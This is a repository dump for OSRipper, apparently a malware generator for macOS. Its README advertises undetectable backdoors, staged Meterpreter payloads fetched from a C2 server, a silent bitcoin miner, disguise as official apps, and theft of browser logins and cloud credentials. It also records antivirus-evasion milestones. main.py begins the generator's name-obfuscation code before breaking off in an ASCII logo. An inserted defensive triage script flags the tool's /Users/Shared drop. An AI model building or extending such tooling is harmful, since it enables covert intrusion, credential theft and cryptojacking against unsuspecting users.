├── .gitattributes ├── .github ├── FUNDING.yml └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── LICENSE ├── README.MD ├── SwiftBelt ├── docs └── CODE_OF_CONDUCT.md ├── img ├── OSRipper.png ├── example.png ├── screenshot.png ├── vt.png ├── vt_app.png └── wiki.png ├── main.py ├── obfuscator.py ├── obfuscator2.py ├── requirements.txt ├── ripgrok.py ├── setup.py └── webroot └── readme.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | 4 | custom: https://www.paypal.me/subglitch1 5 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. 
stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 
21 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | *.pyc 3 | img/.DS_Store 4 | .DS_Store 5 | build/* 6 | dist/* 7 | ocr.py 8 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 SubGlitch1 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | ![Screenshot](img/OSRipper.png) 2 | ``` 3 | 4 | 5 | ,-.----. ,----.. 6 | ,-.----. ,---,\ / \ / / \ .--.--. ,--, ,--, 7 | \ / \ ,`--.' || : \ / . : / / '. |'. \ / .`| 8 | ; : \| : :| | .\ : . / ;. \ : /`. 
/ ; \ `\ /' / ;
| | .\ :: | '. : |: | . ; / ` ; | |--` `. \ / / .'
. : |: || : || | \ : ; | ; \ ; | : ;_ \ \/ / ./
| | \ :' ' ;| : . / | : | ; | '\ \ `. \ \.' /
| : . /| | |; | |`-' . | ' ' ' : `----. \ \ ; ;
; | | ' : ;| | ; ' ; \; / | __ \ \ | / \ \ \
| | ;\ \ | ': ' | \ \ ', / / /`--' / ; /\ \ \
: ' | \.' : |: : : ; : / '--'. /./__; \ ; \
: : :-' ; |.' | | : \ \ .' `--'---' | : / \ \ ;
| |.' '---' `---'.| `---` ; |/ \ ' |
`---' `---` `---' `--`



1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect)
2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended)
3. Create Obfuscated file with custom code
##########################################################################################
Miners
4. Create a silent BTC miner


Please select a module:

```

[![CodeFactor](https://www.codefactor.io/repository/github/subglitch1/osripper/badge)](https://www.codefactor.io/repository/github/subglitch1/osripper/)

OSRipper is a fully undetectable (FUD) backdoor generator and crypter which specialises in macOS (Apple silicon / M1) malware. It will also work on Windows, but there is no support for it for now, it IS NOT FUD on Windows (yet, at least), and Windows is not a focus for now.


# Gen 3 OSRipper backdoor results
https://www.virustotal.com/gui/file/e7e654893cec4e1f1aa76e2bbfa4bb1e0c6a15adf19236845948877e93013aea (py)
https://www.virustotal.com/gui/file-analysis/MjM2MTJiMjI3YTMzM2JjYzExMTJhMzhiMGY4ODQxZjA6MTcwMTcyOTE3MQ== (unix binary)

Note that VirusTotal results reflect the engines and signatures at the time of submission; re-scanning the same sample later can change the verdict.

# Update
Hey, sorry I've been lost in action recently. Happy to say this project still works and the binaries are FUD. I will try to continue as planned.

This is the first v0.3 release. The payloads are now double staged in order to evade AV detection.
Please keep in mind that I develop on Arch and only test on a few platforms, so there are sure to be bugs; please open issues for them.
The biggest difference from the last release is that this project is no longer focused on macOS alone but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim.
With this update, development is officially back in progress.

# Scheme of concept
```
+-----------------+
|    Generated    |
|     Binary      |
+-----------------+
         |
         | Execute
         |
         v
+------------------+
|Obfuscated dropper|
+------------------+
         |
         | GET request
         |
         v
+-----------------+
|                 |
|    C2 SERVER    |
|                 |
+-----------------+
         |
         | Download
         |
         v
+-----------------+
|   Meterpreter   |
|  Staged Payload |
|    (Stage 1)    |
+-----------------+
         |
         | Download
         |
         v
+-----------------+
|    C2 Server    |
+-----------------+
         |
         | Socket
         |
         v
+-----------------+
|   Meterpreter   |
|  Staged Payload |
|    (Stage 2)    |
+-----------------+

```

## Features
- Staged payloads
- FUD (for macOS)
- Cloaks as an official app (Microsoft, ExpressVPN etc.)
- Dumps system info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc.
(more in Cedric Owens' SwiftBelt)
- Encrypted communications
- Rootkit-like behaviour
- Every backdoor generated is entirely unique
- ngrok support


## Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently):

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper:

![Screenshot](img/example.png)

![Screenshot](img/vt.png)

![Screenshot](img/vt_app.png)
macOS .apps will look like this on VT


## Getting Started

### Dependencies

You need Python. If you do not wish to install Python you can download a compiled release.
The Python dependencies are specified in the requirements.txt file.

Since version 1.4 you will need Metasploit installed and on PATH so that it can handle the Meterpreter listeners.


## Installing
### Linux
```bash
apt install git python3 -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
sudo python3 setup.py
```
### Windows
```bash
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
python3 setup.py
```
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.3

### Executing program
Only this:
```
sudo python3 main.py
```
## Contributing
Please feel free to fork and open pull requests.
Suggestions and criticism are appreciated as well.

## Roadmap
### v0.1
- ✅ Get detection down to 0/26 on antiscan.me
- ✅ Add changelog
- ✅ Daemonise backdoor
- ✅ Add crypter
- ✅ Add more backdoor templates
- ✅ Get detection down to 0/68 on VT (for mac malware)

### v0.2
- ✅ Add AntiVM
- [ ] Implement Tor hidden services
- ✅ Add logger
- ✅ Add password stealer
- [ ] Add keylogger
- ✅ Add some new evasion options
- ✅ Add SilentMiner
- [ ] Make proper C2 server

### v0.3
- ✅ Add C2
- ✅ Double staged web delivery
- ⏳ Backdoor pushes data to C2 through POST request
- ❔❓ Add post-exploitation modules? (I'm not sure if this would be helpful)
- ⏳ Add shells with modules instead of Python Meterpreter
## Help

Just open an issue and I'll make sure to get back to you.

## Changelog
* 0.2.1
  * OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes browser history, passwords, system information, keys, etc.


* 0.1.6
  * Process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
* 0.1.5
  * Added crypter
* 0.1.4
  * Added 4th module
* 0.1.3
  * Got detection on VT down to 0. Made the process invisible
* 0.1.2
  * Added 3rd module and listener
* 0.1.1
  * Initial release

## License

MIT

## Acknowledgments

Inspiration, code snippets, etc.
* [htr](https://github.com/htr-tech/PyObfuscate)
* [swiftbelt](https://github.com/cedowens/SwiftBelt)




## Disclaimer
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
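The README states two host-side indicators a defender can act on: the changelog (0.1.6) says the process renames itself to `com.apple.system.monitor` and drops into `/Users/Shared`, and module 1 opens a listening port on the victim. The following triage script is an added example for this page, not code from OSRipper or its author. The process and socket records are constructed sample input; their field layout, the set of directories treated as Apple-owned, and the port number 4444 are assumptions for illustration rather than the output of any specific tool.

```python
"""Host-side triage for the indicators this README states.

Added example; not part of OSRipper. Process and socket records are
constructed sample input, and the Apple-owned path list is an assumption.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumption: first-party Apple executables live under these prefixes.
APPLE_OWNED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
DROP_DIR = "/Users/Shared/"          # drop location named in the changelog
WILDCARD_ADDRS = {"0.0.0.0", "*", "::"}


@dataclass(frozen=True)
class Proc:
    pid: int
    name: str   # process/comm name as it would appear in a process list
    exe: str    # absolute path of the backing executable


@dataclass(frozen=True)
class Listener:
    pid: int
    addr: str   # local bind address
    port: int


def impersonates_apple(p: Proc) -> bool:
    """A com.apple.* name whose binary is outside Apple-owned paths."""
    return p.name.startswith("com.apple.") and not p.exe.startswith(APPLE_OWNED_PREFIXES)


def executes_from_shared(p: Proc) -> bool:
    """Nothing legitimate should be running out of /Users/Shared."""
    return p.exe.startswith(DROP_DIR)


def triage(procs: List[Proc], listeners: List[Listener]) -> List[Tuple[int, str, Tuple[str, ...]]]:
    """Return (pid, name, reasons) for every process matching an indicator.

    A wildcard listener on its own is not an indicator (sshd does that too),
    so it is only recorded as context on a process that is already flagged.
    """
    by_pid: Dict[int, List[Listener]] = {}
    for l in listeners:
        by_pid.setdefault(l.pid, []).append(l)

    findings = []
    for p in procs:
        reasons = []
        if impersonates_apple(p):
            reasons.append("apple-name-outside-system-path")
        if executes_from_shared(p):
            reasons.append("executes-from-/Users/Shared")
        if reasons:
            for l in by_pid.get(p.pid, []):
                if l.addr in WILDCARD_ADDRS:
                    reasons.append(f"bind-listener-{l.port}")
            findings.append((p.pid, p.name, tuple(reasons)))
    return findings


# Constructed sample input (not real telemetry). Port 4444 is an arbitrary
# value inside the 1024-65535 range the generator prompts for.
SAMPLE_PROCS = [
    Proc(1, "launchd", "/sbin/launchd"),
    Proc(312, "com.apple.system.monitor", "/Users/Shared/com.apple.system.monitor"),
    Proc(415, "sshd", "/usr/sbin/sshd"),
    Proc(522, "python3", "/Users/alice/.venv/bin/python3"),
]
SAMPLE_LISTENERS = [
    Listener(415, "*", 22),
    Listener(312, "0.0.0.0", 4444),
]

if __name__ == "__main__":
    for pid, name, reasons in triage(SAMPLE_PROCS, SAMPLE_LISTENERS):
        print(f"pid {pid} ({name}): {', '.join(reasons)}")
```

On a live host the `Proc` and `Listener` records would be filled from a process listing and `lsof -i -P -n` output; the point of the two-step logic is that a wildcard bind only adds weight once the process already fails the path check, so ordinary daemons such as sshd are not reported.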
224 | 225 | 226 | 227 | 228 | 229 | 230 | -------------------------------------------------------------------------------- /SwiftBelt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/SwiftBelt -------------------------------------------------------------------------------- /docs/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 
14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 
55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | . 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 
99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 
129 | -------------------------------------------------------------------------------- /img/OSRipper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/OSRipper.png -------------------------------------------------------------------------------- /img/example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/example.png -------------------------------------------------------------------------------- /img/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/screenshot.png -------------------------------------------------------------------------------- /img/vt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/vt.png -------------------------------------------------------------------------------- /img/vt_app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/vt_app.png -------------------------------------------------------------------------------- /img/wiki.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/wiki.png -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | ######################################## 2 | #-------OSRIPPER MASTER 
V0.3.1---------# 3 | ######################################## 4 | 5 | import os 6 | import socket 7 | import shutil 8 | import platform 9 | from urllib import response 10 | import secrets 11 | import string 12 | from ripgrok import get_tunnels 13 | import random 14 | from pickle import GLOBAL 15 | import subprocess 16 | 17 | 18 | 19 | bind = 0 20 | ## RandomVariables 21 | nonce1 = secrets.randbelow(13) 22 | nonce2 = secrets.randbelow(13) 23 | UltimateRandomNumberhigh = random.randint(14, 30) 24 | UltimateRandomNumberlow = secrets.randbelow(nonce1) 25 | UltimateRandomNumberhigh2 = random.randint(14, 30) 26 | UltimateRandomNumberlow2 = secrets.randbelow(nonce2) 27 | sleeptime = secrets.randbelow(12) 28 | VariableRange = random.randint(8, 22) 29 | VariableRange2 = random.randint(8, 22) 30 | VariableRange3 = random.randint(8, 22) 31 | RandomisationNum = random.randint(UltimateRandomNumberlow, UltimateRandomNumberhigh) 32 | RandomisationNum2 = random.randint(UltimateRandomNumberlow2, UltimateRandomNumberhigh2) 33 | c = "".join( 34 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 35 | for i in range(int(VariableRange)) 36 | ) 37 | d = "".join( 38 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 39 | for i in range(int(VariableRange2)) 40 | ) 41 | so = "".join( 42 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 43 | for i in range(int(VariableRange)) 44 | ) 45 | s = "".join( 46 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 47 | for i in range(int(VariableRange2)) 48 | ) 49 | l = "".join( 50 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 51 | for i in range(int(VariableRange3)) 52 | ) 53 | dr = "".join( 54 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 55 | for i in range(int(VariableRange3)) 56 | ) 57 | ## jesus christ that was a LOT of random variables (and there are even more hidden away) 58 | reps = False 59 | 60 | 61 | def logo(): 62 | logo1 = """ 63 | 64 | 
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 65 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 66 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 67 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 68 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓███████████████████████▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░ 69 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓█████████████████████████████████▓▒░░░░░░░░░░░░░░░░░░░░ 70 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓████████████████████████████████████████▓▒░░░░░░░░░░░░░░░░░ 71 | ░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓███████████████████████████████████████████████▒░░░░░░░░░░░░░░ 72 | ░░░░░░░░░░░░░░░░░░░░░░░░▒▓███████████████████████████████████████████████████▒░░░░░░░░░░░░ 73 | ░░░░░░░░░░░░░░░░░░░░░░░▓██████████████████████████████████████████████████▒░░░░░░░░░░░░░░░ 74 | ░░░░░░░░░░░░░░░░░░░░░▓█████████████████████████████████████████████████▓▒░░░░░░░░░░░░░░░░░ 75 | ░░░░░░░░░░░░░░░░░░░░▓█████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░ 76 | ░░░░░░░░░░░░░░░░░░░█████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░░░ 77 | ░░░░░░░░░░░░░░░░░░████████████████████████████████████████████████▓░░░░░░░░░░░░░░░░░░░░░░░ 78 | ░░░░░░░░░░░░░░░░░████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░░░░░░ 79 | ░░░░░░░░░░░░░░░░▓███████████████████████████████████████████████░░░░░░░░░░░░░░░░░░░░░░░░░░ 80 | ░░░░░░░░░░░░░░░▒███████████████▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓███████████▓░░░░░░░░░░░░░░░░░░░░░░░░░░░ 81 | ░░░░░░░░░░░░░░░█████████████▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓██████▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 82 | ░░░░░░░░░░░░░░▓███████████▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓███▓▓▒▒▒▒▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░ 83 | ░░░░░░░░░░░░░░███████████▓▒▒▒▒▓▓▓▒▒▒▓▓▓▓▓▒▒▒▒▒▒▓▓██▓▒▒▓▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 84 | 
░░░░░░░░░░░░░▒██████████▓▒▒▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▓██▓▓▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 85 | ░░░░░░░░░░░░░██████████▓▒▒▓██▓▓▓▓▒▒▒▒▒▒▒▓▓▒▒▓▒▓▓▓▓▓▓▓▒▒▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 86 | ░░░░░░░░░░░░░██████████▒▒▓█▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 87 | ░░░░░░░░░░░░▒████████▓▓▒▒█▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▓▒▒▒▒▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 88 | ░░░░░░░░░░░░▓████████▓▒▒█▓█▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▓▒▒▒▒▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 89 | ░░░░░░░░░░░░▓█████████▓▓█░▓█▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▓▒▓▓▒▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 90 | ░░░░░░░░░░░░▓███████▓▒░▒▒▒▒▒▓█▓▓▓▓▓▓▓▒▒▒▒▒▓▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 91 | ░░░░░░░░░░░░▓██████▒░░▒▓▓▒▒▒▒▒▓▓█▓▓▓▓▓▓▒▒▓▓▓▒▒▒▒▒▒▒▓▓▓▒▒▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 92 | ░░░░░░░░░░░░██████░░░░▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▓▓▒▓▓▓▓▒▒▒▒▒▒▒▓▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 93 | ░░░░░░░░░░░░▒████▓░░░░░▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 94 | ░░░░░░░░░░░░▓████▒░░░░░░▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓█████████▓▓▓▓▓▓▓▓█▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 95 | ░░░░░░░░░░░░▒████░░░░░░░░░░░░░░▓▓▓▒▒▒▒▒▒▓▓▓████████▓▓▓▓▓██▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 96 | ░░░░░░░░░░░░▒███▓░░░░░░░░░░░░░░▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓██▓▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 97 | ░░░░░░░░░░░░░███▓░░░░░░░░░░░░░░▓▓▓▒▒▓▓▒█▒▒▒▒▒▒▓▓▓██▓▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 98 | ░░░░░░░░░░░░░███▓░░░░░░░░░░░░░░▓▓▓▒▓▓▒▒█▒▓▓▒▒▒▓▓▓▒█▒▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 99 | ░░░░░░░░░░░░░▒▒▒░░░░░░░░░░░░░░░░▒▓▓▒▒▒▓▓▒█▓▒▓▒▓▓▓░░░▓███▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 100 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▒▒▒▒▒▒▒▒▓▓▒▒░░░███▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 101 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▒▒▒▒▒▒▓▓▒░░░░██▓█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 102 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▒▒▒▓▓▓░░░░░█▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 103 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▓▓▓░░░░░█▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 104 | 
